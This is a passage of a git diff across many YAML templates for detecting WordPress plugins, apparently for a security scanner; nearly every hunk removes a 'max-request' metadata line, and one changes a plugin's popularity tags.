b/http/technologies/wordpress/plugins/coblocks.yaml index ebe4ee41a7..5c8ce709b6 100644 --- a/http/technologies/wordpress/plugins/coblocks.yaml +++ b/http/technologies/wordpress/plugins/coblocks.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/coblocks/ metadata: - max-request: 1 plugin_namespace: coblocks wpscan: https://wpscan.com/plugin/coblocks tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/code-snippets.yaml b/http/technologies/wordpress/plugins/code-snippets.yaml index 5c32110e0e..aea47b9e84 100644 --- a/http/technologies/wordpress/plugins/code-snippets.yaml +++ b/http/technologies/wordpress/plugins/code-snippets.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/code-snippets/ metadata: - max-request: 1 plugin_namespace: code-snippets wpscan: https://wpscan.com/plugin/code-snippets tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/coming-soon.yaml b/http/technologies/wordpress/plugins/coming-soon.yaml index 09c2e2f360..78c584c388 100644 --- a/http/technologies/wordpress/plugins/coming-soon.yaml +++ b/http/technologies/wordpress/plugins/coming-soon.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/coming-soon/ metadata: - max-request: 1 plugin_namespace: coming-soon wpscan: https://wpscan.com/plugin/coming-soon tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/complianz-gdpr.yaml b/http/technologies/wordpress/plugins/complianz-gdpr.yaml index 1a2e8beb3e..2c80d09c27 100644 --- a/http/technologies/wordpress/plugins/complianz-gdpr.yaml +++ b/http/technologies/wordpress/plugins/complianz-gdpr.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/complianz-gdpr/ metadata: - max-request: 1 plugin_namespace: complianz-gdpr wpscan: https://wpscan.com/plugin/complianz-gdpr tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/contact-form-7-honeypot.yaml b/http/technologies/wordpress/plugins/contact-form-7-honeypot.yaml index 706145493c..4b1b3a8754 100644 --- a/http/technologies/wordpress/plugins/contact-form-7-honeypot.yaml +++ b/http/technologies/wordpress/plugins/contact-form-7-honeypot.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/contact-form-7-honeypot/ metadata: - max-request: 1 plugin_namespace: contact-form-7-honeypot wpscan: https://wpscan.com/plugin/contact-form-7-honeypot tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/contact-form-7.yaml b/http/technologies/wordpress/plugins/contact-form-7.yaml index cf6a6ee635..06ad83bdf7 100644 --- a/http/technologies/wordpress/plugins/contact-form-7.yaml +++ b/http/technologies/wordpress/plugins/contact-form-7.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/contact-form-7/ metadata: - max-request: 1 plugin_namespace: contact-form-7 wpscan: https://wpscan.com/plugin/contact-form-7 tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/contact-form-cfdb7.yaml b/http/technologies/wordpress/plugins/contact-form-cfdb7.yaml index c039765929..b20666268f 100644 --- a/http/technologies/wordpress/plugins/contact-form-cfdb7.yaml +++ b/http/technologies/wordpress/plugins/contact-form-cfdb7.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/contact-form-cfdb7/ metadata: - max-request: 1 plugin_namespace: contact-form-cfdb7 wpscan: https://wpscan.com/plugin/contact-form-cfdb7 tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/cookie-law-info.yaml b/http/technologies/wordpress/plugins/cookie-law-info.yaml index a2c92dff4b..b2a097bfe7 100644 --- a/http/technologies/wordpress/plugins/cookie-law-info.yaml +++ b/http/technologies/wordpress/plugins/cookie-law-info.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/cookie-law-info/ metadata: - max-request: 1 plugin_namespace: cookie-law-info wpscan: https://wpscan.com/plugin/cookie-law-info tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/cookie-notice.yaml b/http/technologies/wordpress/plugins/cookie-notice.yaml index 41b5d6c854..c71fa258af 100644 --- a/http/technologies/wordpress/plugins/cookie-notice.yaml +++ b/http/technologies/wordpress/plugins/cookie-notice.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/cookie-notice/ metadata: - max-request: 1 plugin_namespace: cookie-notice wpscan: https://wpscan.com/plugin/cookie-notice tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/creame-whatsapp-me.yaml b/http/technologies/wordpress/plugins/creame-whatsapp-me.yaml index cca31cc3a9..5a98e67597 100644 --- a/http/technologies/wordpress/plugins/creame-whatsapp-me.yaml +++ b/http/technologies/wordpress/plugins/creame-whatsapp-me.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/creame-whatsapp-me/ metadata: - max-request: 1 plugin_namespace: creame-whatsapp-me wpscan: https://wpscan.com/plugin/creame-whatsapp-me tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/creative-mail-by-constant-contact.yaml b/http/technologies/wordpress/plugins/creative-mail-by-constant-contact.yaml index ff9c0a49ce..4463174203 100644 --- a/http/technologies/wordpress/plugins/creative-mail-by-constant-contact.yaml +++ b/http/technologies/wordpress/plugins/creative-mail-by-constant-contact.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/creative-mail-by-constant-contact/ metadata: - max-request: 1 plugin_namespace: creative-mail-by-constant-contact wpscan: https://wpscan.com/plugin/creative-mail-by-constant-contact tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/custom-css-js.yaml b/http/technologies/wordpress/plugins/custom-css-js.yaml index a76d3306bb..cfac0b961b 100644 --- a/http/technologies/wordpress/plugins/custom-css-js.yaml +++ b/http/technologies/wordpress/plugins/custom-css-js.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/custom-css-js/ metadata: - max-request: 1 plugin_namespace: custom-css-js wpscan: https://wpscan.com/plugin/custom-css-js tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/custom-fonts.yaml b/http/technologies/wordpress/plugins/custom-fonts.yaml index 2249681b6d..846761f2f7 100644 --- a/http/technologies/wordpress/plugins/custom-fonts.yaml +++ b/http/technologies/wordpress/plugins/custom-fonts.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/custom-fonts/ metadata: - max-request: 1 plugin_namespace: custom-fonts wpscan: https://wpscan.com/plugin/custom-fonts tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/custom-post-type-ui.yaml b/http/technologies/wordpress/plugins/custom-post-type-ui.yaml index b5389b27c9..0def6e61ca 100644 --- a/http/technologies/wordpress/plugins/custom-post-type-ui.yaml +++ b/http/technologies/wordpress/plugins/custom-post-type-ui.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/custom-post-type-ui/ metadata: - max-request: 1 plugin_namespace: custom-post-type-ui wpscan: https://wpscan.com/plugin/custom-post-type-ui tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/disable-comments.yaml b/http/technologies/wordpress/plugins/disable-comments.yaml index 00d183f507..5c5decc127 100644 --- a/http/technologies/wordpress/plugins/disable-comments.yaml +++ b/http/technologies/wordpress/plugins/disable-comments.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/disable-comments/ metadata: - max-request: 1 plugin_namespace: disable-comments wpscan: https://wpscan.com/plugin/disable-comments tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/disable-gutenberg.yaml b/http/technologies/wordpress/plugins/disable-gutenberg.yaml index 451e1daef1..a8229a338e 100644 --- a/http/technologies/wordpress/plugins/disable-gutenberg.yaml +++ b/http/technologies/wordpress/plugins/disable-gutenberg.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/disable-gutenberg/ metadata: - max-request: 1 plugin_namespace: disable-gutenberg wpscan: https://wpscan.com/plugin/disable-gutenberg tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/duplicate-page.yaml b/http/technologies/wordpress/plugins/duplicate-page.yaml index af30ca76b6..6559e64dce 100644 --- a/http/technologies/wordpress/plugins/duplicate-page.yaml +++ b/http/technologies/wordpress/plugins/duplicate-page.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/duplicate-page/ metadata: - max-request: 1 plugin_namespace: duplicate-page wpscan: https://wpscan.com/plugin/duplicate-page tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/duplicate-post.yaml b/http/technologies/wordpress/plugins/duplicate-post.yaml index 93823466d4..a4368b8aa6 100644 --- a/http/technologies/wordpress/plugins/duplicate-post.yaml +++ b/http/technologies/wordpress/plugins/duplicate-post.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/duplicate-post/ metadata: - max-request: 1 plugin_namespace: duplicate-post wpscan: https://wpscan.com/plugin/duplicate-post tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/duplicator.yaml b/http/technologies/wordpress/plugins/duplicator.yaml index e224283ecd..ec119e762a 100644 --- a/http/technologies/wordpress/plugins/duplicator.yaml +++ b/http/technologies/wordpress/plugins/duplicator.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/duplicator/ metadata: - max-request: 1 plugin_namespace: duplicator wpscan: https://wpscan.com/plugin/duplicator tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/duracelltomi-google-tag-manager.yaml b/http/technologies/wordpress/plugins/duracelltomi-google-tag-manager.yaml index 9af8df08a7..b7ec7576a3 100644 --- a/http/technologies/wordpress/plugins/duracelltomi-google-tag-manager.yaml +++ b/http/technologies/wordpress/plugins/duracelltomi-google-tag-manager.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/duracelltomi-google-tag-manager/ metadata: - max-request: 1 plugin_namespace: duracelltomi-google-tag-manager wpscan: https://wpscan.com/plugin/duracelltomi-google-tag-manager tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/easy-fancybox.yaml b/http/technologies/wordpress/plugins/easy-fancybox.yaml index d4081474c3..c42d679973 100644 --- a/http/technologies/wordpress/plugins/easy-fancybox.yaml +++ b/http/technologies/wordpress/plugins/easy-fancybox.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/easy-fancybox/ metadata: - max-request: 1 plugin_namespace: easy-fancybox wpscan: https://wpscan.com/plugin/easy-fancybox tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/easy-table-of-contents.yaml b/http/technologies/wordpress/plugins/easy-table-of-contents.yaml index bcbc0707fb..fc44375947 100644 --- a/http/technologies/wordpress/plugins/easy-table-of-contents.yaml +++ b/http/technologies/wordpress/plugins/easy-table-of-contents.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/easy-table-of-contents/ metadata: - max-request: 1 plugin_namespace: easy-table-of-contents wpscan: https://wpscan.com/plugin/easy-table-of-contents tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/easy-wp-smtp.yaml b/http/technologies/wordpress/plugins/easy-wp-smtp.yaml index 8b23832297..a1616c1741 100644 --- a/http/technologies/wordpress/plugins/easy-wp-smtp.yaml +++ b/http/technologies/wordpress/plugins/easy-wp-smtp.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/easy-wp-smtp/ metadata: - max-request: 1 plugin_namespace: easy-wp-smtp wpscan: https://wpscan.com/plugin/easy-wp-smtp tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/elementor.yaml b/http/technologies/wordpress/plugins/elementor.yaml index f0c3e4bc63..6cfb8bc272 100644 --- a/http/technologies/wordpress/plugins/elementor.yaml +++ b/http/technologies/wordpress/plugins/elementor.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/elementor/ metadata: - max-request: 1 plugin_namespace: elementor wpscan: https://wpscan.com/plugin/elementor tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/elementskit-lite.yaml b/http/technologies/wordpress/plugins/elementskit-lite.yaml index eab4a0d725..9caaa53263 100644 --- a/http/technologies/wordpress/plugins/elementskit-lite.yaml +++ b/http/technologies/wordpress/plugins/elementskit-lite.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/elementskit-lite/ metadata: - max-request: 1 plugin_namespace: elementskit-lite wpscan: https://wpscan.com/plugin/elementskit-lite tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/enable-media-replace.yaml b/http/technologies/wordpress/plugins/enable-media-replace.yaml index 74c172ac94..5e6b557952 100644 --- a/http/technologies/wordpress/plugins/enable-media-replace.yaml +++ b/http/technologies/wordpress/plugins/enable-media-replace.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/enable-media-replace/ metadata: - max-request: 1 plugin_namespace: enable-media-replace wpscan: https://wpscan.com/plugin/enable-media-replace tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/envato-elements.yaml b/http/technologies/wordpress/plugins/envato-elements.yaml index f5a63a2ed2..c5a665e6f7 100644 --- a/http/technologies/wordpress/plugins/envato-elements.yaml +++ b/http/technologies/wordpress/plugins/envato-elements.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/envato-elements/ metadata: - max-request: 1 plugin_namespace: envato-elements wpscan: https://wpscan.com/plugin/envato-elements tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/essential-addons-for-elementor-lite.yaml b/http/technologies/wordpress/plugins/essential-addons-for-elementor-lite.yaml index 25ca7328ef..a8b56b5df0 100644 --- a/http/technologies/wordpress/plugins/essential-addons-for-elementor-lite.yaml +++ b/http/technologies/wordpress/plugins/essential-addons-for-elementor-lite.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/essential-addons-for-elementor-lite/ metadata: - max-request: 1 plugin_namespace: essential-addons-for-elementor-lite wpscan: https://wpscan.com/plugin/essential-addons-for-elementor-lite tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/ewww-image-optimizer.yaml b/http/technologies/wordpress/plugins/ewww-image-optimizer.yaml index cb1db5bee6..4e20e57107 100644 --- a/http/technologies/wordpress/plugins/ewww-image-optimizer.yaml +++ b/http/technologies/wordpress/plugins/ewww-image-optimizer.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/ewww-image-optimizer/ metadata: - max-request: 1 plugin_namespace: ewww-image-optimizer wpscan: https://wpscan.com/plugin/ewww-image-optimizer tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/facebook-for-woocommerce.yaml b/http/technologies/wordpress/plugins/facebook-for-woocommerce.yaml index a3207ea16a..6f6a416595 100644 --- a/http/technologies/wordpress/plugins/facebook-for-woocommerce.yaml +++ b/http/technologies/wordpress/plugins/facebook-for-woocommerce.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/facebook-for-woocommerce/ metadata: - max-request: 1 plugin_namespace: facebook-for-woocommerce wpscan: https://wpscan.com/plugin/facebook-for-woocommerce tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/fast-indexing-api.yaml b/http/technologies/wordpress/plugins/fast-indexing-api.yaml index 2a4b772078..2dd0ef57b5 100644 --- a/http/technologies/wordpress/plugins/fast-indexing-api.yaml +++ b/http/technologies/wordpress/plugins/fast-indexing-api.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/fast-indexing-api/ metadata: - max-request: 1 plugin_namespace: fast-indexing-api wpscan: https://wpscan.com/plugin/fast-indexing-api tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/favicon-by-realfavicongenerator.yaml b/http/technologies/wordpress/plugins/favicon-by-realfavicongenerator.yaml index 366205085d..11942f4fa4 100644 --- a/http/technologies/wordpress/plugins/favicon-by-realfavicongenerator.yaml +++ b/http/technologies/wordpress/plugins/favicon-by-realfavicongenerator.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/favicon-by-realfavicongenerator/ metadata: - max-request: 1 plugin_namespace: favicon-by-realfavicongenerator wpscan: https://wpscan.com/plugin/favicon-by-realfavicongenerator tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/flamingo.yaml b/http/technologies/wordpress/plugins/flamingo.yaml index 598f08ce88..87c2aeb4bd 100644 --- a/http/technologies/wordpress/plugins/flamingo.yaml +++ b/http/technologies/wordpress/plugins/flamingo.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/flamingo/ metadata: - max-request: 1 plugin_namespace: flamingo wpscan: https://wpscan.com/plugin/flamingo tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/fluentform.yaml b/http/technologies/wordpress/plugins/fluentform.yaml index 42cdfb4475..3696eefbf7 100644 --- a/http/technologies/wordpress/plugins/fluentform.yaml +++ b/http/technologies/wordpress/plugins/fluentform.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/fluentform/ metadata: - max-request: 1 plugin_namespace: fluentform wpscan: https://wpscan.com/plugin/fluentform tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/font-awesome.yaml b/http/technologies/wordpress/plugins/font-awesome.yaml index a1af263dbd..8bab0a9c3e 100644 --- a/http/technologies/wordpress/plugins/font-awesome.yaml +++ b/http/technologies/wordpress/plugins/font-awesome.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/font-awesome/ metadata: - max-request: 1 plugin_namespace: font-awesome wpscan: https://wpscan.com/plugin/font-awesome tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/force-regenerate-thumbnails.yaml b/http/technologies/wordpress/plugins/force-regenerate-thumbnails.yaml index 19265f910e..affd270123 100644 --- a/http/technologies/wordpress/plugins/force-regenerate-thumbnails.yaml +++ b/http/technologies/wordpress/plugins/force-regenerate-thumbnails.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/force-regenerate-thumbnails/ metadata: - max-request: 1 plugin_namespace: force-regenerate-thumbnails wpscan: https://wpscan.com/plugin/force-regenerate-thumbnails tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/formidable.yaml b/http/technologies/wordpress/plugins/formidable.yaml index c21d414695..1e6a62e23b 100644 --- a/http/technologies/wordpress/plugins/formidable.yaml +++ b/http/technologies/wordpress/plugins/formidable.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/formidable/ metadata: - max-request: 1 plugin_namespace: formidable wpscan: https://wpscan.com/plugin/formidable tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/forminator.yaml b/http/technologies/wordpress/plugins/forminator.yaml index 91c89d0ad8..980265f531 100644 --- a/http/technologies/wordpress/plugins/forminator.yaml +++ b/http/technologies/wordpress/plugins/forminator.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/forminator/ metadata: - max-request: 1 plugin_namespace: forminator wpscan: https://wpscan.com/plugin/forminator tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/ga-google-analytics.yaml b/http/technologies/wordpress/plugins/ga-google-analytics.yaml index 539d9f7cec..daf205789d 100644 --- a/http/technologies/wordpress/plugins/ga-google-analytics.yaml +++ b/http/technologies/wordpress/plugins/ga-google-analytics.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/ga-google-analytics/ metadata: - max-request: 1 plugin_namespace: ga-google-analytics wpscan: https://wpscan.com/plugin/ga-google-analytics tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml b/http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml index f4123bb594..22bfa3ffe2 100644 --- a/http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml +++ b/http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/gdpr-cookie-compliance/ metadata: - max-request: 1 plugin_namespace: gdpr-cookie-compliance wpscan: https://wpscan.com/plugin/gdpr-cookie-compliance tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/google-analytics-dashboard-for-wp.yaml b/http/technologies/wordpress/plugins/google-analytics-dashboard-for-wp.yaml index 23a88ea130..7ed171d662 100644 --- a/http/technologies/wordpress/plugins/google-analytics-dashboard-for-wp.yaml +++ b/http/technologies/wordpress/plugins/google-analytics-dashboard-for-wp.yaml @@ -7,10 +7,9 @@ info: reference: - https://wordpress.org/plugins/google-analytics-dashboard-for-wp/ metadata: - max-request: 1 plugin_namespace: google-analytics-dashboard-for-wp wpscan: https://wpscan.com/plugin/google-analytics-dashboard-for-wp - tags: tech,wordpress,wp-plugin,top-100,top-200 + tags: tech,wordpress,wp-plugin,top-200 http: - method: GET diff --git a/http/technologies/wordpress/plugins/google-analytics-for-wordpress.yaml b/http/technologies/wordpress/plugins/google-analytics-for-wordpress.yaml index 8074ac337e..ad238445fc 100644 --- a/http/technologies/wordpress/plugins/google-analytics-for-wordpress.yaml +++ b/http/technologies/wordpress/plugins/google-analytics-for-wordpress.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/google-analytics-for-wordpress/ metadata: - max-request: 1 plugin_namespace: google-analytics-for-wordpress wpscan: https://wpscan.com/plugin/google-analytics-for-wordpress tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/google-listings-and-ads.yaml b/http/technologies/wordpress/plugins/google-listings-and-ads.yaml index 575c9ebe67..840c086fb9 100644 --- a/http/technologies/wordpress/plugins/google-listings-and-ads.yaml +++ b/http/technologies/wordpress/plugins/google-listings-and-ads.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/google-listings-and-ads/ metadata: - max-request: 1 plugin_namespace: google-listings-and-ads wpscan: https://wpscan.com/plugin/google-listings-and-ads tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/google-site-kit.yaml b/http/technologies/wordpress/plugins/google-site-kit.yaml index 7b0f188ff7..2678f603c6 100644 --- a/http/technologies/wordpress/plugins/google-site-kit.yaml +++ b/http/technologies/wordpress/plugins/google-site-kit.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/google-site-kit/ metadata: - max-request: 1 plugin_namespace: google-site-kit wpscan: https://wpscan.com/plugin/google-site-kit tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/google-sitemap-generator.yaml b/http/technologies/wordpress/plugins/google-sitemap-generator.yaml index 898e4de56d..20d947a5d1 100644 --- a/http/technologies/wordpress/plugins/google-sitemap-generator.yaml +++ b/http/technologies/wordpress/plugins/google-sitemap-generator.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/google-sitemap-generator/ metadata: - max-request: 1 plugin_namespace: google-sitemap-generator wpscan: https://wpscan.com/plugin/google-sitemap-generator tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/gtranslate.yaml b/http/technologies/wordpress/plugins/gtranslate.yaml index 4a76856a69..22ee97b51f 100644 --- a/http/technologies/wordpress/plugins/gtranslate.yaml +++ b/http/technologies/wordpress/plugins/gtranslate.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/gtranslate/ metadata: - max-request: 1 plugin_namespace: gtranslate wpscan: https://wpscan.com/plugin/gtranslate tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/gutenberg.yaml b/http/technologies/wordpress/plugins/gutenberg.yaml index b321ca63eb..3f4c6c8936 100644 --- a/http/technologies/wordpress/plugins/gutenberg.yaml +++ b/http/technologies/wordpress/plugins/gutenberg.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/gutenberg/ metadata: - max-request: 1 plugin_namespace: gutenberg wpscan: https://wpscan.com/plugin/gutenberg tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/happy-elementor-addons.yaml b/http/technologies/wordpress/plugins/happy-elementor-addons.yaml index 2b42c9f80c..fa1bb64115 100644 --- a/http/technologies/wordpress/plugins/happy-elementor-addons.yaml +++ b/http/technologies/wordpress/plugins/happy-elementor-addons.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/happy-elementor-addons/ metadata: - max-request: 1 plugin_namespace: happy-elementor-addons wpscan: https://wpscan.com/plugin/happy-elementor-addons tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/header-and-footer-scripts.yaml b/http/technologies/wordpress/plugins/header-and-footer-scripts.yaml index 2409c6b370..a8eca7b056 100644 --- a/http/technologies/wordpress/plugins/header-and-footer-scripts.yaml +++ b/http/technologies/wordpress/plugins/header-and-footer-scripts.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/header-and-footer-scripts/ metadata: - max-request: 1 plugin_namespace: header-and-footer-scripts wpscan: https://wpscan.com/plugin/header-and-footer-scripts tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/header-footer-code-manager.yaml b/http/technologies/wordpress/plugins/header-footer-code-manager.yaml index dbea07a6da..da63d1cbf6 100644 --- a/http/technologies/wordpress/plugins/header-footer-code-manager.yaml +++ b/http/technologies/wordpress/plugins/header-footer-code-manager.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/header-footer-code-manager/ metadata: - max-request: 1 plugin_namespace: header-footer-code-manager wpscan: https://wpscan.com/plugin/header-footer-code-manager tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/header-footer-elementor.yaml b/http/technologies/wordpress/plugins/header-footer-elementor.yaml index 17a8f220cf..f94e7f6494 100644 --- a/http/technologies/wordpress/plugins/header-footer-elementor.yaml +++ b/http/technologies/wordpress/plugins/header-footer-elementor.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/header-footer-elementor/ metadata: - max-request: 1 plugin_namespace: header-footer-elementor wpscan: https://wpscan.com/plugin/header-footer-elementor tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/header-footer.yaml b/http/technologies/wordpress/plugins/header-footer.yaml index 956a08b32d..95d2aa5f16 100644 --- a/http/technologies/wordpress/plugins/header-footer.yaml +++ b/http/technologies/wordpress/plugins/header-footer.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/header-footer/ metadata: - max-request: 1 plugin_namespace: header-footer wpscan: https://wpscan.com/plugin/header-footer tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/health-check.yaml b/http/technologies/wordpress/plugins/health-check.yaml index 5a570b9077..af8193b875 100644 --- a/http/technologies/wordpress/plugins/health-check.yaml +++ b/http/technologies/wordpress/plugins/health-check.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/health-check/ metadata: - max-request: 1 plugin_namespace: health-check wpscan: https://wpscan.com/plugin/health-check tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/hello-dolly.yaml b/http/technologies/wordpress/plugins/hello-dolly.yaml index 4ecac0cd92..8d7e45818b 100644 --- a/http/technologies/wordpress/plugins/hello-dolly.yaml +++ b/http/technologies/wordpress/plugins/hello-dolly.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/hello-dolly/ metadata: - max-request: 1 plugin_namespace: hello-dolly wpscan: https://wpscan.com/plugin/hello-dolly tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/host-webfonts-local.yaml b/http/technologies/wordpress/plugins/host-webfonts-local.yaml index e50f58cef8..ed3967db7b 100644 --- a/http/technologies/wordpress/plugins/host-webfonts-local.yaml +++ b/http/technologies/wordpress/plugins/host-webfonts-local.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/host-webfonts-local/ metadata: - max-request: 1 plugin_namespace: host-webfonts-local wpscan: https://wpscan.com/plugin/host-webfonts-local tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/imagify.yaml b/http/technologies/wordpress/plugins/imagify.yaml index 031bb48563..2ff5adba86 100644 --- a/http/technologies/wordpress/plugins/imagify.yaml +++ b/http/technologies/wordpress/plugins/imagify.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/imagify/ metadata: - max-request: 1 plugin_namespace: imagify wpscan: https://wpscan.com/plugin/imagify tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/imsanity.yaml b/http/technologies/wordpress/plugins/imsanity.yaml index 3cdcf3da93..9099f3c0a5 100644 --- a/http/technologies/wordpress/plugins/imsanity.yaml +++ b/http/technologies/wordpress/plugins/imsanity.yaml @@ -7,7 +7,6 